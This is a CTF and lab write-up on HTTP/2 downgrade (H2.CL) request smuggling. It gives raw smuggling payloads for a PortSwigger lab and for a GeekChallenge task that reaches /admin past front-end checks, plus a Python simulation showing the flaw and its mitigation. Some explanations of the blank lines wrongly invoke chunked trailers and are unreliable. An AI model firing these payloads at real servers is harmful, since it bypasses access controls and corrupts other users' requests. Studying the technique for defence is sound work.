CTF challenge type: HTTP/2 downgrade smuggling, principle analysis & worked examples
Table of contents
- CTF challenge type: HTTP/2 downgrade smuggling, principle analysis & worked examples
- How HTTP/2 request smuggling arises
- A quick review of HTTP request smuggling
- How HTTP/2 delimits messages
- Constraints of real production environments
- How to exploit it
- H2.CL
- Preparing the lab environment
- Worked examples
- H2.CL request smuggling
- [GeekChallenge 2023 Ez_Smuggling]
Please study the principles of HTTP request smuggling first as prerequisite knowledge:
https://blog.csdn.net/qq_39947980/article/details/136821139
How HTTP/2 request smuggling arises
A quick review of HTTP request smuggling
Request smuggling essentially exploits differences in how different servers parse the request-length header (Content-Length).
How HTTP/2 delimits messages
An HTTP/2 message is a series of independent "frames" sent over the network. Each frame is preceded by an explicit length field that tells the server how many bytes to read, so the length of a request is the sum of its frame lengths.
In theory, this binary framing is considered to make HTTP/2 inherently immune to request smuggling.
In practice that is often not the case, because of the widespread but dangerous practice of HTTP/2 downgrading.
Constraints of real production environments
Because HTTP/2 is relatively new, web servers that support it must talk to legacy back ends that only speak HTTP/1. It has therefore become common practice for the front-end server to rewrite every incoming HTTP/2 request using HTTP/1 syntax; this "downgraded" request is then forwarded to the relevant back-end server.
Downgrading is extremely common and is the default behaviour of many popular reverse proxy services.
Since HTTP/2 is not particularly mature, web servers that support HTTP/2 generally still communicate with back-end infrastructure that only supports HTTP/1.
So even though the front-end server talks HTTP/2 with the client, it rewrites the request to HTTP/1 when forwarding it to the back end. When the HTTP/1-only back end sends a response, the front end rewrites it to HTTP/2 and returns it to the client.
How to exploit it
The downgrade involves an HTTP/2 -> HTTP/1.1 rewrite, and the rewrite creates ambiguity.
H2.CL
During downgrading, the front-end server usually adds an HTTP/1 Content-Length header whose value is derived from HTTP/2's built-in length mechanism. But if the HTTP/2 request already carried a Content-Length before downgrading, that field is not validated as it propagates up through Http2MultiplexHandler and is used directly when the request is rewritten as HTTP/1. So, just like TE.CL in HTTP/1, we can use Content-Length to mislead the front-end server and fix where the request ends, and thereby smuggle a request.
This is much the same as HTTP/1 request smuggling (the front end is involved in both cases);
the difference is that this time we only care about how the back end parses the request, and then find a way to get it "cached".
In practice, though, there are many details to get right.
Preparing the lab environment
Turn off automatic Content-Length updating
Enable the HTTP/2 override
Change the protocol to HTTP/2
Worked examples
H2.CL request smuggling
Lab environment: https://portswigger.net/web-security/request-smuggling/advanced/lab-request-smuggling-h2-cl-request-smuggling
POST / HTTP/2
Host: YOUR-LAB-ID.web-security-academy.net
Content-Length: 0

POST /exploit HTTP/1.1
Host: exploit-0a0f00a304f12eda80540c60018400c1.exploit-server.net
Content-Length: 5

x=1
I want everyone to pay attention to this part:
Content-Length: 5
x=1
[this is a blank line]
Why add a blank line?
Reason: the end of the HTTP headers is signalled by a trailer, which marks the end of the message.
The body is clearly 3 characters, so why 5? (This is similar to the TE.CL example in the previous article.)
Because the request headers of the next incoming packet need to be squeezed out; otherwise the back end will treat them as two separate requests.
It only has to be larger than the original length.
It can be 5, 6, 7, 8, 9… (preferably just a little larger).
Try a few more times and the 302 redirect is successfully triggered (a bit odd: the HTTP/2 downgrade can only be triggered by requesting /resources, which I suspect is a lab issue).
It is quite hit-or-miss, so try several times.
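As an added example (not code from the original post or from either lab), the following Python simulation models the H2.CL mechanism described above and the "why 5 rather than 3" discussion: the front end either copies the client's content-length through unverified (the defect) or derives it from the DATA frame lengths (the mitigation), and the back end then splits the resulting byte stream the way a Content-Length-based HTTP/1.1 parser does. All hosts, paths and request bytes are constructed for illustration.

```python
# Added example (not from the original post): a simulation of the HTTP/2 -> HTTP/1.1
# downgrade on a front end and of Content-Length parsing on an HTTP/1.1 back end.
# All requests, hosts and header values below are constructed for illustration.

def downgrade_h2(method, path, headers, data_frames, trust_client_cl):
    """Rewrite an HTTP/2 request (headers + DATA frames) as HTTP/1.1 bytes.
    The body's true length is the sum of the DATA frame lengths. With
    trust_client_cl=True a client-supplied content-length is copied through
    unverified, which is the H2.CL defect; otherwise the length is taken from
    the frames (rejecting a mismatching client value is the stricter option)."""
    body = b"".join(data_frames)
    h = {k.lower(): v for k, v in headers.items()}
    if not (trust_client_cl and "content-length" in h):
        h["content-length"] = str(len(body))  # hardened: the framing is the truth
    head = f"{method} {path} HTTP/1.1\r\n" + "".join(f"{k}: {v}\r\n" for k, v in h.items())
    return head.encode() + b"\r\n" + body

def parse_h1_stream(stream):
    """Split a byte stream into HTTP/1.1 requests the way a CL-based back end does.
    Returns (complete_requests, pending): pending is a request still waiting for
    body bytes, i.e. its Content-Length is larger than what has arrived so far."""
    reqs, pending = [], None
    while stream:
        end = stream.find(b"\r\n\r\n")
        if end < 0:
            pending = stream
            break
        request_line, *hdr_lines = stream[:end].decode().split("\r\n")
        hdrs = {k.lower(): v for k, v in (l.split(": ", 1) for l in hdr_lines)}
        cl, rest = int(hdrs.get("content-length", 0)), stream[end + 4:]
        if len(rest) < cl:
            pending = stream  # back end keeps reading: the next request gets glued on
            break
        reqs.append((request_line, rest[:cl]))
        stream = rest[cl:]
    return reqs, pending

# Constructed: the smuggled HTTP/1.1 request, 3 body bytes under a Content-Length of 5
SMUGGLED = (b"GET /admin HTTP/1.1\r\nHost: backend.internal\r\n"
            b"Content-Length: 5\r\n\r\nx=1")
VICTIM = b"GET /home HTTP/1.1\r\nHost: front.example\r\n\r\n"  # the next user's request

def simulate(trust_client_cl):
    """Downgrade one HTTP/2 request whose body is SMUGGLED, append the next user's
    request on the same back-end connection, and show how the back end splits it."""
    wire = downgrade_h2("POST", "/", {"host": "front.example", "content-length": "0"},
                        [SMUGGLED], trust_client_cl)
    return parse_h1_stream(wire + VICTIM)
```

With `simulate(True)` the back end sees three requests, the last being the victim's request with its first two bytes eaten by the smuggled request's oversized Content-Length; with `simulate(False)` the would-be smuggled text is just the body of a single POST and the victim's request is parsed intact.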
[GeekChallenge 2023 Ez_Smuggling]
The approach is essentially identical to the previous challenge; the hint is that a proxy server was set up using HTTP/2.
We first need to register an account.
From the challenge hint we can tell that the front-end server performs validation.
Try HTTP/2 downgrade smuggling to bypass the front-end restriction.
Use HTTP/2-CL truncation and "caching" to smuggle.
Because we enter the blog only after logging in, the request needs to carry the Cookie.
Construct the payload:
GET / HTTP/2
Host: 23.94.38.86:9500
Cookie: [the logged-in session cookie; long cookie value omitted]
Content-Length: 0

POST /admin HTTP/1.1
Cookie: [the same session cookie; long cookie value omitted]
Content-Length: 5

x=1
[this is a blank line] // Reason: after the terminating chunk comes a trailer made up of 0 or more entity headers, which can be used to hold things like a digital signature of the data
The HTTP/2 downgrade smuggling succeeded.
Another way: use the GET method.
Content-Length: 0

GET /admin HTTP/1.1
Cookie: [the same session cookie; long cookie value omitted]
[this is a blank line] // the required separator between the headers and the body
[this is a blank line] // marks the end of the message; after the terminating chunk comes a trailer made up of 0 or more entity headers, which can be used to hold things like a digital signature of the data
The flag can be obtained the same way.